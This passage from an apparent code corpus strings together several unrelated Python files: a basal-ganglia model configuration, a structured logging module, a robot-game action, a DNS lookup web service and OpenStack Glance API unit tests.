Rougier (dummy@email.com)\n# -----------------------------------------------------------------------------\n\n# --- Time ---\nms = 0.001\ndt = 1*ms\ntau = 10*ms\n\n# --- Learning ---\nalpha_CUE = 0.050\nalpha_LTP = 0.002\nalpha_LTD = 0.001\n\n# --- Sigmoid ---\nVmin = 0\nVmax = 20\nVh = 16\nVc = 3\n\n# --- Model ---\ndecision_threshold = 40\nnoise = 0.001\nCTX_rest = -3.0\nSTR_rest = 0.0\nSTN_rest = -10.0\nGPI_rest = 10.0\nTHL_rest = -40.0\n\n# --- Cues & Rewards ---\nV_cue = 7\nrewards = 3/3.,2/3.,1/3.,0/3.\n\n# -- Weight ---\nWmin = 0.25\nWmax = 0.75\ngains = { ""CTX.cog -> STR.cog"" : +1.0,\n ""CTX.mot -> STR.mot"" : +1.0,\n ""CTX.ass -> STR.ass"" : +1.0,\n ""CTX.cog -> STR.ass"" : +0.2,\n ""CTX.mot -> STR.ass"" : +0.2,\n ""CTX.cog -> STN.cog"" : +1.0,\n ""CTX.mot -> STN.mot"" : +1.0,\n ""STR.cog -> GPI.cog"" : -2.0,\n ""STR.mot -> GPI.mot"" : -2.0,\n ""STR.ass -> GPI.cog"" : -2.0,\n ""STR.ass -> GPI.mot"" : -2.0,\n ""STN.cog -> GPI.cog"" : +1.0,\n ""STN.mot -> GPI.mot"" : +1.0,\n ""GPI.cog -> THL.cog"" : -0.25,\n ""GPI.mot -> THL.mot"" : -0.25,\n\n ""THL.cog -> CTX.cog"" : +0.4,\n ""THL.mot -> CTX.mot"" : +0.4,\n ""CTX.cog -> THL.cog"" : +0.1,\n ""CTX.mot -> THL.mot"" : +0.1,\n\n ""CTX.mot -> CTX.mot"" : +0.5,\n ""CTX.cog -> CTX.cog"" : +0.5,\n ""CTX.ass -> CTX.ass"" : +0.5,\n\n ""CTX.ass -> CTX.cog"" : +0.01,\n ""CTX.ass -> CTX.mot"" : +0.025,\n ""CTX.cog -> CTX.ass"" : +0.025,\n ""CTX.mot -> CTX.ass"" : +0.01,\n }\n', '# encoding: utf-8\n#\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Contact: Kyle Lahnakoski (dummy@email.com)\n#\nfrom __future__ import absolute_import, division, unicode_literals\n\nimport os\nimport platform\nimport sys\nfrom datetime import datetime\n\nfrom mo_dots import Data, FlatList, coalesce, is_data, is_list, listwrap, unwraplist, wrap\nfrom mo_future import PY3, is_text, text\nfrom mo_logs import constants, exceptions, strings\nfrom mo_logs.exceptions import Except, LogItem, suppress_exception\nfrom mo_logs.strings import CR, indent\n\n_Thread = None\nif PY3:\n STDOUT = sys.stdout.buffer\nelse:\n STDOUT = sys.stdout\n\n\nclass Log(object):\n """"""\n FOR STRUCTURED LOGGING AND EXCEPTION CHAINING\n """"""\n trace = False\n main_log = None\n logging_multi = None\n profiler = None # simple pypy-friendly profiler\n error_mode = False # prevent error loops\n\n @classmethod\n def start(cls, settings=None):\n """"""\n RUN ME FIRST TO SETUP THE THREADED LOGGING\n http://victorlin.me/2012/08/good-logging-practice-in-python/\n\n log - LIST OF PARAMETERS FOR LOGGER(S)\n trace - SHOW MORE DETAILS IN EVERY LOG LINE (default False)\n cprofile - True==ENABLE THE C-PROFILER THAT COMES WITH PYTHON (default False)\n USE THE LONG FORM TO SET THE FILENAME {""enabled"": True, ""filename"": ""cprofile.tab""}\n profile - True==ENABLE pyLibrary SIMPLE PROFILING (default False) (eg with Profiler(""some description""):)\n USE THE LONG FORM TO SET FILENAME {""enabled"": True, ""filename"": ""profile.tab""}\n constants - UPDATE MODULE CONSTANTS AT STARTUP (PRIMARILY INTENDED TO CHANGE DEBUG STATE)\n """"""\n global _Thread\n if not settings:\n return\n settings = wrap(settings)\n\n Log.stop()\n\n cls.settings = settings\n cls.trace = coalesce(settings.trace, False)\n if cls.trace:\n from mo_threads import Thread as _Thread\n _ = _Thread\n\n # ENABLE CPROFILE\n if settings.cprofile is False:\n settings.cprofile = 
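# --- Aside (an assumption, not shown in this file): Vmin, Vmax, Vh and Vc
# above are the standard knobs of a Boltzmann sigmoid transfer function,
# which in this family of basal-ganglia models typically maps a unit's
# input V to a bounded activation. A guess at how the constants are
# consumed, for orientation only:
#
#     U(V) = Vmin + (Vmax - Vmin) / (1 + exp((Vh - V) / Vc))

import math

def sigmoid(v, vmin=0.0, vmax=20.0, vh=16.0, vc=3.0):
    return vmin + (vmax - vmin) / (1.0 + math.exp((vh - v) / vc))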
{""enabled"": False}\n elif settings.cprofile is True:\n if isinstance(settings.cprofile, bool):\n settings.cprofile = {""enabled"": True, ""filename"": ""cprofile.tab""}\n if settings.cprofile.enabled:\n from mo_threads import profiles\n profiles.enable_profilers(settings.cprofile.filename)\n\n if settings.profile is True or (is_data(settings.profile) and settings.profile.enabled):\n Log.error(""REMOVED 2018-09-02, Activedata revision 3f30ff46f5971776f8ba18"")\n # from mo_logs import profiles\n #\n # if isinstance(settings.profile, bool):\n # profiles.ON = True\n # settings.profile = {""enabled"": True, ""filename"": ""profile.tab""}\n #\n # if settings.profile.enabled:\n # profiles.ON = True\n\n if settings.constants:\n constants.set(settings.constants)\n\n logs = coalesce(settings.log, settings.logs)\n if logs:\n cls.logging_multi = StructuredLogger_usingMulti()\n for log in listwrap(logs):\n Log.add_log(Log.new_instance(log))\n\n from mo_logs.log_usingThread import StructuredLogger_usingThread\n cls.main_log = StructuredLogger_usingThread(cls.logging_multi)\n\n @classmethod\n def stop(cls):\n """"""\n DECONSTRUCTS ANY LOGGING, AND RETURNS TO DIRECT-TO-stdout LOGGING\n EXECUTING MULUTIPLE TIMES IN A ROW IS SAFE, IT HAS NO NET EFFECT, IT STILL LOGS TO stdout\n :return: NOTHING\n """"""\n main_log, cls.main_log = cls.main_log, StructuredLogger_usingStream(STDOUT)\n main_log.stop()\n\n @classmethod\n def new_instance(cls, settings):\n settings = wrap(settings)\n\n if settings[""class""]:\n if settings[""class""].startswith(""logging.handlers.""):\n from mo_logs.log_usingHandler import StructuredLogger_usingHandler\n\n return StructuredLogger_usingHandler(settings)\n else:\n with suppress_exception:\n from mo_logs.log_usingLogger import make_log_from_settings\n\n return make_log_from_settings(settings)\n # OH WELL :(\n\n if settings.log_type == ""logger"":\n from mo_logs.log_usingLogger import StructuredLogger_usingLogger\n return StructuredLogger_usingLogger(settings)\n if settings.log_type == ""file"" or settings.file:\n return StructuredLogger_usingFile(settings.file)\n if settings.log_type == ""file"" or settings.filename:\n return StructuredLogger_usingFile(settings.filename)\n if settings.log_type == ""console"":\n from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream\n return StructuredLogger_usingThreadedStream(STDOUT)\n if settings.log_type == ""mozlog"":\n from mo_logs.log_usingMozLog import StructuredLogger_usingMozLog\n return StructuredLogger_usingMozLog(STDOUT, coalesce(settings.app_name, settings.appname))\n if settings.log_type == ""stream"" or settings.stream:\n from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream\n return StructuredLogger_usingThreadedStream(settings.stream)\n if settings.log_type == ""elasticsearch"" or settings.stream:\n from mo_logs.log_usingElasticSearch import StructuredLogger_usingElasticSearch\n return StructuredLogger_usingElasticSearch(settings)\n if settings.log_type == ""email"":\n from mo_logs.log_usingEmail import StructuredLogger_usingEmail\n return StructuredLogger_usingEmail(settings)\n if settings.log_type == ""ses"":\n from mo_logs.log_usingSES import StructuredLogger_usingSES\n return StructuredLogger_usingSES(settings)\n if settings.log_type.lower() in [""nothing"", ""none"", ""null""]:\n from mo_logs.log_usingNothing import StructuredLogger\n return StructuredLogger()\n\n Log.error(""Log type of {{log_type|quote}} is not recognized"", log_type=settings.log_type)\n\n @classmethod\n 
def add_log(cls, log):\n cls.logging_multi.add_log(log)\n\n @classmethod\n def note(\n cls,\n template,\n default_params={},\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n if not is_text(template):\n Log.error(""Log.note was expecting a unicode template"")\n\n Log._annotate(\n LogItem(\n context=exceptions.NOTE,\n format=template,\n template=template,\n params=dict(default_params, **more_params)\n ),\n timestamp,\n stack_depth+1\n )\n\n @classmethod\n def unexpected(\n cls,\n template,\n default_params={},\n cause=None,\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param cause: *Exception* for chaining\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n if not is_text(template):\n Log.error(""Log.warning was expecting a unicode template"")\n\n if isinstance(default_params, BaseException):\n cause = default_params\n default_params = {}\n\n if ""values"" in more_params.keys():\n Log.error(""Can not handle a logging parameter by name `values`"")\n\n params = Data(dict(default_params, **more_params))\n cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])\n trace = exceptions.get_stacktrace(stack_depth + 1)\n\n e = Except(exceptions.UNEXPECTED, template=template, params=params, cause=cause, trace=trace)\n Log._annotate(\n e,\n timestamp,\n stack_depth+1\n )\n\n @classmethod\n def alarm(\n cls,\n template,\n default_params={},\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n format = (""*"" * 80) + CR + indent(template, prefix=""** "").strip() + CR + (""*"" * 80)\n Log._annotate(\n LogItem(\n context=exceptions.ALARM,\n format=format,\n template=template,\n params=dict(default_params, **more_params)\n ),\n timestamp,\n stack_depth + 1\n )\n\n alert = alarm\n\n @classmethod\n def warning(\n cls,\n template,\n default_params={},\n cause=None,\n stack_depth=0,\n log_context=None,\n **more_params\n ):\n """"""\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param cause: *Exception* for chaining\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for 
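# --- The dispatch in Log.new_instance() above is a long if-chain mapping
# settings.log_type to a logger class. A registry-based sketch of the same
# idea (hypothetical, not mo_logs API), which keeps each backend's import
# cost behind its own factory:

LOGGER_FACTORIES = {}

def register_logger(log_type):
    def decorator(factory):
        LOGGER_FACTORIES[log_type] = factory
        return factory
    return decorator

@register_logger("console")
def make_console_logger(settings):
    import sys
    return sys.stdout  # placeholder backend for the sketch

def new_logger(settings):
    try:
        return LOGGER_FACTORIES[settings["log_type"]](settings)
    except KeyError:
        raise ValueError("unrecognized log_type %r" % settings.get("log_type"))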
your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n timestamp = datetime.utcnow()\n if not is_text(template):\n Log.error(""Log.warning was expecting a unicode template"")\n\n if isinstance(default_params, BaseException):\n cause = default_params\n default_params = {}\n\n if ""values"" in more_params.keys():\n Log.error(""Can not handle a logging parameter by name `values`"")\n\n params = Data(dict(default_params, **more_params))\n cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])\n trace = exceptions.get_stacktrace(stack_depth + 1)\n\n e = Except(exceptions.WARNING, template=template, params=params, cause=cause, trace=trace)\n Log._annotate(\n e,\n timestamp,\n stack_depth+1\n )\n\n @classmethod\n def error(\n cls,\n template, # human readable template\n default_params={}, # parameters for template\n cause=None, # pausible cause\n stack_depth=0,\n **more_params\n ):\n """"""\n raise an exception with a trace for the cause too\n\n :param template: *string* human readable string with placeholders for parameters\n :param default_params: *dict* parameters to fill in template\n :param cause: *Exception* for chaining\n :param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller\n :param log_context: *dict* extra key:value pairs for your convenience\n :param more_params: *any more parameters (which will overwrite default_params)\n :return:\n """"""\n if not is_text(template):\n sys.stderr.write(str(""Log.error was expecting a unicode template""))\n Log.error(""Log.error was expecting a unicode template"")\n\n if default_params and isinstance(listwrap(default_params)[0], BaseException):\n cause = default_params\n default_params = {}\n\n params = Data(dict(default_params, **more_params))\n\n add_to_trace = False\n if cause == None:\n causes = None\n elif is_list(cause):\n causes = []\n for c in listwrap(cause): # CAN NOT USE LIST-COMPREHENSION IN PYTHON3 (EXTRA STACK DEPTH FROM THE IN-LINED GENERATOR)\n causes.append(Except.wrap(c, stack_depth=1))\n causes = FlatList(causes)\n elif isinstance(cause, BaseException):\n causes = Except.wrap(cause, stack_depth=1)\n else:\n causes = None\n Log.error(""can only accept Exception, or list of exceptions"")\n\n trace = exceptions.get_stacktrace(stack_depth + 1)\n\n if add_to_trace:\n cause[0].trace.extend(trace[1:])\n\n e = Except(context=exceptions.ERROR, template=template, params=params, cause=causes, trace=trace)\n raise_from_none(e)\n\n @classmethod\n def _annotate(\n cls,\n item,\n timestamp,\n stack_depth\n ):\n """"""\n :param itemt: A LogItemTHE TYPE OF MESSAGE\n :param stack_depth: FOR TRACKING WHAT LINE THIS CAME FROM\n :return:\n """"""\n item.timestamp = timestamp\n item.machine = machine_metadata\n item.template = strings.limit(item.template, 10000)\n\n item.format = strings.limit(item.format, 10000)\n if item.format == None:\n format = text(item)\n else:\n format = item.format.replace(""{{"", ""{{params."")\n if not format.startswith(CR) and format.find(CR) > -1:\n format = CR + format\n\n if cls.trace:\n log_format = item.format = ""{{machine.name}} (pid {{machine.pid}}) - {{timestamp|datetime}} - {{thread.name}} - \\""{{location.file}}:{{location.line}}\\"" - ({{location.method}}) - "" + format\n f = sys._getframe(stack_depth + 1)\n item.location = {\n ""line"": f.f_lineno,\n ""file"": text(f.f_code.co_filename),\n ""method"": text(f.f_code.co_name)\n }\n thread = _Thread.current()\n item.thread = {""name"": thread.name, 
""id"": thread.id}\n else:\n log_format = item.format = ""{{timestamp|datetime}} - "" + format\n\n cls.main_log.write(log_format, item.__data__())\n\n def write(self):\n raise NotImplementedError\n\n\ndef _same_frame(frameA, frameB):\n return (frameA.line, frameA.file) == (frameB.line, frameB.file)\n\n\n# GET THE MACHINE METADATA\nmachine_metadata = wrap({\n ""pid"": os.getpid(),\n ""python"": text(platform.python_implementation()),\n ""os"": text(platform.system() + platform.release()).strip(),\n ""name"": text(platform.node())\n})\n\n\ndef raise_from_none(e):\n raise e\n\nif PY3:\n exec(""def raise_from_none(e):\\n raise e from None\\n"", globals(), locals())\n\n\nfrom mo_logs.log_usingFile import StructuredLogger_usingFile\nfrom mo_logs.log_usingMulti import StructuredLogger_usingMulti\nfrom mo_logs.log_usingStream import StructuredLogger_usingStream\n\n\nif not Log.main_log:\n Log.main_log = StructuredLogger_usingStream(STDOUT)\n\n', '# This file is part of Beneath a Binary Sky.\n# Copyright (C) 2016, Aidin Gharibnavaz dummy@email.com\n#\n# Beneath a Binary Sky is free software: you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# Beneath a Binary Sky is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Beneath a Binary Sky. If not, see\n# .\n\nimport time\n\nfrom actions.action import Action\nfrom actions.exceptions import InvalidArgumentsError, RobotHaveNoWaterError\nfrom world.world import World\nfrom database.exceptions import LockAlreadyAquiredError\n\n\nclass WaterAction(Action):\n\n def __init__(self):\n super().__init__()\n\n self._world = World()\n\n def do_action(self, robot, args):\n \'\'\'Waters the square robot stands on.\n\n @param robot: Instance of `objects.robot.Robot\'.\n \'\'\'\n if len(args) != 1:\n raise InvalidArgumentsError(""`water\' action takes no arguments."")\n\n if not robot.get_has_water():\n raise RobotHaveNoWaterError(""Robot does not carry water."")\n\n try:\n square = self._world.get_square(robot.get_location(), for_update=True)\n except LockAlreadyAquiredError:\n # Waiting a little, and trying one more time.\n time.sleep(0.02)\n square = self._world.get_square(robot.get_location(), for_update=True)\n\n # Note: we don\'t raise an exception if there\'s no plant. 
A robot can waste its water.\n plant = square.get_plant()\n if plant is not None:\n plant.set_water_level(100)\n robot.set_honor(robot.get_honor() + 1)\n\n robot.set_has_water(False)\n', '#!/usr/bin/env python3\n\nimport os, logging, argparse, json, datetime\nimport requests\nimport dns.resolver\nfrom bottle import route, request, response, redirect, hook, error, default_app, view, static_file, template\n\ndef set_content_type(fn):\n\tdef _return_type(*args, **kwargs):\n\t\tif request.headers.get(\'Accept\') == ""application/json"":\n\t\t\tresponse.headers[\'Content-Type\'] = \'application/json\'\n\t\tif request.headers.get(\'Accept\') == ""text/plain"":\n\t\t\tresponse.headers[\'Content-Type\'] = \'text/plain\'\n\t\tif request.method != \'OPTIONS\':\n\t\t\treturn fn(*args, **kwargs)\n\treturn _return_type\n\ndef enable_cors(fn):\n\tdef _enable_cors(*args, **kwargs):\n\t\tresponse.headers[\'Access-Control-Allow-Origin\'] = \'*\'\n\t\tresponse.headers[\'Access-Control-Allow-Methods\'] = \'GET, POST, PUT, OPTIONS\'\n\t\tresponse.headers[\'Access-Control-Allow-Headers\'] = \'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token\'\n\n\t\tif request.method != \'OPTIONS\':\n\t\t\treturn fn(*args, **kwargs)\n\treturn _enable_cors\n\ndef resolveDomain(domain, recordType, args):\n\trecords = []\n\n\tif args.doh:\n\t\ttry:\n\t\t\tpayload = {\n\t\t\t\t\'name\': domain,\n\t\t\t\t\'type\': recordType\n\t\t\t}\n\t\t\tdata = requests.get(""{}"".format(args.resolver), params=payload)\n\t\t\tfor rec in data.json()[\'Answer\']:\n\t\t\t\trecords.append(rec[\'data\'])\n\t\texcept:\n\t\t\treturn records\n\t\treturn records\n\telse:\n\t\ttry:\n\t\t\tresolver = dns.resolver.Resolver()\n\t\t\tresolver.nameservers = args.resolver.split(\',\')\n\t\t\t\n\t\t\tif recordType in args.records.split(\',\'):\n\t\t\t\tlookup = resolver.resolve(domain, recordType)\n\t\t\t\tfor data in lookup:\n\t\t\t\t\tif recordType in [\'A\', \'AAAA\']:\n\t\t\t\t\t\trecords.append(data.address)\n\t\t\t\t\telif recordType in [\'TXT\']:\n\t\t\t\t\t\tfor rec in data.strings:\n\t\t\t\t\t\t\trecords.append(rec.decode(""utf-8"").replace(\'""\', \'\').strip())\n\t\t\t\t\telse:\n\t\t\t\t\t\trecords.append(str(data).replace(\'""\', \'\').strip())\n\t\t\treturn records\n\t\texcept dns.resolver.NXDOMAIN:\n\t\t\treturn records\n\t\texcept dns.resolver.NoAnswer:\n\t\t\treturn records\n\t\texcept dns.exception.Timeout:\n\t\t\treturn records\n\t\texcept dns.resolver.NoNameservers:\n\t\t\treturn records\n\t\t\n@error(\'404\')\n@error(\'403\')\ndef returnError(code, msg, contentType=""text/plain""):\n\tresponse.status = int(code)\n\tresponse.content_type = contentType\n\treturn template(\'error\')\n\n@route(\'/static/\')\ndef static(filepath):\n\treturn static_file(filepath, root=\'views/static\')\n\n@route(\'/servers\')\ndef servers():\n\ttry:\n\t\tresponse.content_type = \'text/plain\'\n\t\treturn ""\\r\\n"".join(args.resolver.split("",""))\n\texcept:\n\t\treturn ""Unable to open servers file.""\n\t\t\n@route(\'/version\')\ndef version():\n\ttry:\n\t\tdirname, filename = os.path.split(os.path.abspath(__file__))\n\t\tdel filename\n\t\tf = open(os.getenv(\'VERSION_PATH\', dirname + \'/.git/refs/heads/master\'), \'r\')\n\t\tcontent = f.read()\n\t\tresponse.content_type = \'text/plain\'\n\t\treturn content\n\texcept:\n\t\treturn ""Unable to open version file.""\n\n@route(\'/\')\ndef route_redirect(record):\n\treturn redirect(""/{}/A"".format(record))\n\n@route(\'//\')\n@route(\'//.\')\n@set_content_type\n@enable_cors\ndef loadRecord(record, 
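# --- The retry-once pattern in do_action() above, generalized: attempt the
# locked read, sleep briefly on contention, then let the final failure
# propagate. fetch() and the exception class below are stand-ins for the
# world / database layer imported above; sketch only.

import time

class LockAlreadyAquiredError(Exception):  # stand-in for database.exceptions
    pass

def get_square_with_retry(fetch, location, retries=1, delay=0.02):
    for attempt in range(retries + 1):
        try:
            return fetch(location, for_update=True)
        except LockAlreadyAquiredError:
            if attempt == retries:
                raise          # out of retries: surface the contention
            time.sleep(delay)  # back off briefly before trying again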
type=\'A\', ext=\'html\'):\n\ttry:\n\t\tif record == """":\n\t\t\traise ValueError\n\t\tif not ext in [""html"",""txt"", ""text"", ""json""]:\n\t\t\traise ValueError\n\t\tif not type.upper() in args.records.split(\',\'):\n\t\t\traise ValueError\n\texcept ValueError:\n\t\treturn returnError(404, ""Not Found"", ""text/html"")\n\n\tif ext in [""json""]:\n\t\tresponse.content_type = \'application/json\'\n\tif ext in [""txt"", ""text""]:\n\t\tresponse.content_type = \'text/plain\'\n\n\t# We make a request to get information\n\tdata = resolveDomain(record, type.upper(), args)\n\n\tif response.content_type == \'application/json\':\n\t\treturn json.dumps({\n\t\t\t\'results\': {\n\t\t\t\t\'name\': record,\n\t\t\t\t\'type\': type.upper(),\n\t\t\t\t\'records\': data,\n\t\t\t}\n\t\t})\n\telif response.content_type == ""text/plain"":\n\t\treturn ""\\r\\n"".join(data)\n\telse:\n\t\treturn template(\'rec\', {\n\t\t\t\'name\': record,\n\t\t\t\'type\': type.upper(),\n\t\t\t\'records\': data,\n\t\t\t\'recTypes\': args.records.split(\',\')\n\t\t})\n\n@route(\'/\', (\'GET\', \'POST\'))\ndef index():\n\n\tif request.method == ""POST"":\n\t\trecordName = request.forms.get(\'recordName\', \'\')\n\t\trecordType = request.forms.get(\'recordType\', \'\')\n\n\t\tif recordName != \'\' and recordType in args.records.split(\',\'):\n\t\t\treturn redirect(""/{}/{}"".format(recordName, recordType))\n\t\telse:\n\t\t\treturn returnError(404, ""We were not able to figure out what you were asking for"", ""text/html"")\n\n\treturn template(""home"", {\n\t\t\'recTypes\': args.records.split(\',\')\n\t})\n\nif __name__ == \'__main__\':\n\n\tparser = argparse.ArgumentParser()\n\n\t# Server settings\n\tparser.add_argument(""-i"", ""--host"", default=os.getenv(\'HOST\', \'127.0.0.1\'), help=""server ip"")\n\tparser.add_argument(""-p"", ""--port"", default=os.getenv(\'PORT\', 5000), help=""server port"")\n\n\t# Redis settings\n\tparser.add_argument(""--redis"", default=os.getenv(\'REDIS\', \'redis://localhost:6379/0\'), help=""redis connection string"")\n\n\t# Application settings\n\tparser.add_argument(""--doh"", help=""use DNS-over-HTTPS and treat --resolver as DNS-over-HTTPS capable (beta)"", action=""store_true"")\n\tparser.add_argument(""--records"", default=os.getenv(\'RECORDS\', ""A,AAAA,CAA,CNAME,DS,DNSKEY,MX,NS,NSEC,NSEC3,RRSIG,SOA,TXT""), help=""supported records"")\n\tparser.add_argument(""--resolver"", default=os.getenv(\'RESOLVER\', \'127.0.0.1\'), help=""resolver address"")\n\n\t# Verbose mode\n\tparser.add_argument(""--verbose"", ""-v"", help=""increase output verbosity"", action=""store_true"")\n\targs = parser.parse_args()\n\n\tif args.verbose:\n\t\tlogging.basicConfig(level=logging.DEBUG)\n\telse:\n\t\tlogging.basicConfig(level=logging.INFO)\n\tlog = logging.getLogger(__name__)\n\n\ttry:\n\t\tapp = default_app()\n\t\tapp.run(host=args.host, port=args.port, server=\'tornado\')\n\texcept:\n\t\tlog.error(""Unable to start server on {}:{}"".format(args.host, args.port))', '# vim: tabstop=4 shiftwidth=4 softtabstop=4\n# -*- coding: utf-8 -*-\n\n# Copyright 2010-2011 OpenStack, LLC\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License""); you may\n# not use this file except in compliance with the License. 
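# --- Minimal standalone use of dnspython's Resolver, mirroring the non-DoH
# branch of resolveDomain() above, trimmed to the A-record case (sketch;
# resolver.resolve() requires dnspython >= 2.0, as the code above does).

import dns.exception
import dns.resolver

def resolve_a(domain, nameservers=('127.0.0.1',)):
    resolver = dns.resolver.Resolver()
    resolver.nameservers = list(nameservers)
    try:
        return [rr.address for rr in resolver.resolve(domain, 'A')]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer,
            dns.exception.Timeout, dns.resolver.NoNameservers):
        return []  # the route handler above returns an empty list too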
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport datetime\nimport hashlib\nimport json\nimport StringIO\n\nfrom oslo.config import cfg\nimport routes\nimport six\nimport webob\n\nimport glance.api\nimport glance.api.common\nfrom glance.api.v1 import filters\nfrom glance.api.v1 import images\nfrom glance.api.v1 import router\nfrom glance.common import exception\nimport glance.common.config\nimport glance.context\nfrom glance.db.sqlalchemy import api as db_api\nfrom glance.db.sqlalchemy import models as db_models\nfrom glance.openstack.common import timeutils\nfrom glance.openstack.common import uuidutils\nimport glance.store.filesystem\nfrom glance.tests.unit import base\nfrom glance.tests import utils as test_utils\nimport glance.tests.unit.utils as unit_test_utils\n\nCONF = cfg.CONF\n\n_gen_uuid = uuidutils.generate_uuid\n\nUUID1 = _gen_uuid()\nUUID2 = _gen_uuid()\n\n\nclass TestGlanceAPI(base.IsolatedUnitTest):\n def setUp(self):\n """"""Establish a clean test environment""""""\n super(TestGlanceAPI, self).setUp()\n self.mapper = routes.Mapper()\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))\n self.FIXTURES = [\n {\'id\': UUID1,\n \'name\': \'fake image #1\',\n \'status\': \'active\',\n \'disk_format\': \'ami\',\n \'container_format\': \'ami\',\n \'is_public\': False,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': None,\n \'size\': 13,\n \'locations\': [{\'url\': ""file:///%s/%s"" % (self.test_dir, UUID1),\n \'metadata\': {}}],\n \'properties\': {\'type\': \'kernel\'}},\n {\'id\': UUID2,\n \'name\': \'fake image #2\',\n \'status\': \'active\',\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'is_public\': True,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': \'abc123\',\n \'size\': 19,\n \'locations\': [{\'url\': ""file:///%s/%s"" % (self.test_dir, UUID2),\n \'metadata\': {}}],\n \'properties\': {}}]\n self.context = glance.context.RequestContext(is_admin=True)\n db_api.setup_db_env()\n db_api.get_engine()\n self.destroy_fixtures()\n self.create_fixtures()\n\n def tearDown(self):\n """"""Clear the test environment""""""\n super(TestGlanceAPI, self).tearDown()\n self.destroy_fixtures()\n\n def create_fixtures(self):\n for fixture in self.FIXTURES:\n db_api.image_create(self.context, fixture)\n # We write a fake image file to the filesystem\n with open(""%s/%s"" % (self.test_dir, fixture[\'id\']), \'wb\') as image:\n image.write(""chunk00000remainder"")\n image.flush()\n\n def destroy_fixtures(self):\n # Easiest to just drop the models and re-create them...\n db_models.unregister_models(db_api._ENGINE)\n db_models.register_models(db_api._ENGINE)\n\n def _do_test_defaulted_format(self, format_key, format_value):\n fixture_headers = {\'x-image-meta-name\': \'defaulted\',\n \'x-image-meta-location\': \'http://localhost:0/image\',\n format_key: format_value}\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = 
req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n res_body = json.loads(res.body)[\'image\']\n self.assertEquals(format_value, res_body[\'disk_format\'])\n self.assertEquals(format_value, res_body[\'container_format\'])\n\n def test_defaulted_amazon_format(self):\n for key in (\'x-image-meta-disk-format\',\n \'x-image-meta-container-format\'):\n for value in (\'aki\', \'ari\', \'ami\'):\n self._do_test_defaulted_format(key, value)\n\n def test_bad_disk_format(self):\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'invalid\',\n \'x-image-meta-container-format\': \'ami\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n self.assertTrue(\'Invalid disk format\' in res.body, res.body)\n\n def test_configured_disk_format_good(self):\n self.config(disk_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'foo\',\n \'x-image-meta-container-format\': \'bare\',\n }\n\n req = webob.Request.blank(""/images"")\n req.method = \'POST\'\n for k, v in fixture_headers.iteritems():\n req.headers[k] = v\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_configured_disk_format_bad(self):\n self.config(disk_formats=[\'foo\'])\n fixture_headers = {\n \'x-image-meta-store\': \'bad\',\n \'x-image-meta-name\': \'bogus\',\n \'x-image-meta-location\': \'http://localhost:0/image.tar.gz\',\n \'x-image-meta-disk-format\': \'bar\',\n 